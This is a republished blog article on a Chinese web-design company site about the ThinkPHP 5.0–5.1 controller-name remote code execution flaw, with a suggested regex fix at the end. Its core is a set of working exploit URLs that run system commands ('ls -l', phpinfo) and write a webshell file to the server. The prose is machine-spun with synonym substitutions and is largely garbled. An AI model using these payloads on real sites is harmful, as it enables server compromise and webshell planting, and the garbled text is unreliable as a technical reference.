商丘做网站,商丘网站优化,商丘网络推广,商丘网络公司
当前位置:首页 > 新闻资讯 > 建站经验 >

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

发表日期:2018-12-13 11:28聚圣源浏览次数: 本文关键词:thinkphp,最,新版本,5.0,到,5.1,高危,漏洞

 

THINKPHP毛病修复,官方于克日,对现有的thinkphp5.0到5.1全部版本举行了升级,以及补丁更新,这次更新重要是举行了一些毛病修复,最严峻的就是之前存在的SQL注入毛病,以及长途代码实行查询体系的毛病都举行了修复,官方本以为没有题目了,但是在现实的宁静检测当中发明,照旧存在题目,照旧可以长途代码举行注入,插入非法字符,提交到办事器后端中去。

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

关于这次发明的oday毛病,我们来看下官方之前更新的代码文件是怎么样的,更新的步伐文件路径是library文件夹下的think目次里的app.php,如下图:

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

毛病产生的缘故原由就在于这个控制器这里,整个thinkphp框架里的功效对控制器没有举行严酷的宁静过滤于查抄,使打击者可以伪造恶意参数举行逼迫插入,最基础的缘故原由就是正则的表达式写的欠好,导致可以绕过。

在controller获取控制器后,直接举行赋值,但是并没有对控制器的名举行严酷的检测,导致可以利用斜杠等特别标记来长途代码注入。

我们来搭建一下网站的情况,apache+mysql+Linux centos体系,搭建好的测试情况地点是http://127.0.01/anquan ,我们可以直接在index.php背面伪造打击参数,示比方下:

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

直接get方法提交到网站中去,可以直接查询到网站当前根目次的全部文件,截图如下:

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

通过该毛病也可以直接长途代码注入实行phpinfo语句,查询当前的php版本,路径,扩展,以及php.ini存放的地点,都可以看得到,结构如下代码即可。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'

thinkphp 最新版本5.0到5.1高危漏洞爆发可直接提权getshell

有些人大概会问了,既然都可以phpinfo,查询目次文件,可不可以getshell写网站木马文件到网站里呢? 答案是可以的,我们测试的时间是以一句话木马代码的写入到safe.php文件里。

http://127.0.0.1/anquan/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%27%27%20>%20safe.php

关于这次thinkphp的毛病使用以及阐发到此就竣事了,该毛病属于高危毛病,危害严峻性较大,许多升级更新补丁的网站都市受到打击,乃至有些网站会被挂马,那么该怎样修复thinkphp的毛病呢?更换之前的正规矩表达式即可,还必要对网站的目次举行权限摆设,防备天生php文件,对网站上的毛病举行修复,大概是对网站宁静防护参数举行重新设置,使他切合其时的网站情况。假如不懂怎样修复网站毛病,也可以找专业的网站宁静公司来处置惩罚,海内如Sinesafe和绿盟、启明星辰等宁静公司比力专业.

针对付这个环境,我们要对其library/think/App.php代码里的正规矩表达式举行变动,if (!preg_match('/^[A-Za-z][\w\.]*$/', $controller)) { throw new HttpException(404, 'controller not exists:' . $controller); }

如没特殊注明,文章均来自网络! 转载请注明来自:http://www.jushengyuan.com.cn/news/jzjy/11968.html

网站设计案例推荐

热门文章

站长工具综合查询里面SSL证书不...

SSL证书不安全是怎么回事?但是点进去这个提示后,显示的是别人的tdk是不是被劫持或者被黑了?...

日期:2018-03-27 浏览次数:1992

简洁而实用的版权信息可增色网...

打开网站,人们自然会从上往下浏览,首先映入眼帘的一定是BANNER主视觉,然后是网站主体内容部分。相比较而言,注意到网站底部版权信息的浏览者确实不多,但这并说明网站版权信...

日期:2018-09-20 浏览次数:1894

网站设计需要注意的3点问题...

对于网站设计来讲会受到很多因素的影响,而且不同类型的网站,在设计时需要体现的元素也不一样,比如说对于一个企业网站更想体现出品牌以及产品的特点,主要是对产品、企业信...

日期:2018-02-12 浏览次数:1817

企业网站为什么要改版 改版选择...

网站改版,是每个建站企业必须面临的工作。相信也有不少站长问,已经做好的企业网站,为何还要大费周章重新进行改版设计呢?下面小编就来给大家说说,企业究竟为什么要改变,并...

日期:2018-03-26 浏览次数:1352

永城网站制作:模板建站不可不...

随着互联网建站尤其是自助建站热潮不断高涨,建站行业涌现出越来越多的自助建站平台,这些平台普遍都提供网站模板可选。...

日期:2018-04-30 浏览次数:946

相关文章

外贸企业“脚踏两艘船” 自建...

对付外贸企业来说,现在面对两种运营模式:一是依靠外贸平台,二是搭建独立网站。外贸平台比方阿里巴巴、亚马逊品级三方电商平台。对付一些久远生长眼光的企业,每每是脚踏两...

日期:2019-02-16 浏览次数:60

企业网站首页设计思维 最近有哪...

近来百度的又遭到了口诛笔伐,由于近来在自媒体平台,关于搜刮引擎另有没有效的话题,引起大热,在网友诸多的答复中,毁誉参半,这不得不让人担心起来,尤其网站,重要流量来...

日期:2019-02-16 浏览次数:64

线下商家如何布局互联网?六合...

颠末多年生长,现在的互联网已经颠覆了传统的贸易模式,成为创业者、企业的必争之地。 凭据数据表现,现在我国的互联网行业已经迎来新增长,网民人数已经凌驾7.53亿,占到总生...

日期:2019-02-16 浏览次数:61

「睢县网络推广」《从0建站,...

最新进度 : 2018年9月18日完成网站搭建 2018年9月19日完成网站风格设置、基本内容设置、网站内容添加等 2018年9月20日计划完成网站搭建、开始正式推广 ----------------------------------------...

日期:2018-09-21 浏览次数:84

「西藏网络营销」网站安全检测...

小程序创业扶持计划 实现月入10万创业梦 thinkphp在国内来说,很多站长以及平台都在使用这套开源的系统来建站,为什么会这么深受大家的喜欢,第一开源,便捷,高效,生成静态化...

日期:2018-09-07 浏览次数:192

随机推荐

新站网站推广该如何做,只用三...

互联网+时代 你的企业“脸面”...

浅谈爬虫及绕过网站反爬取机制...

「阳泉市网站建设」响应式网站...

小米路由器免费提供404页面带给...

怎样实现乡村旅游网站的建设与...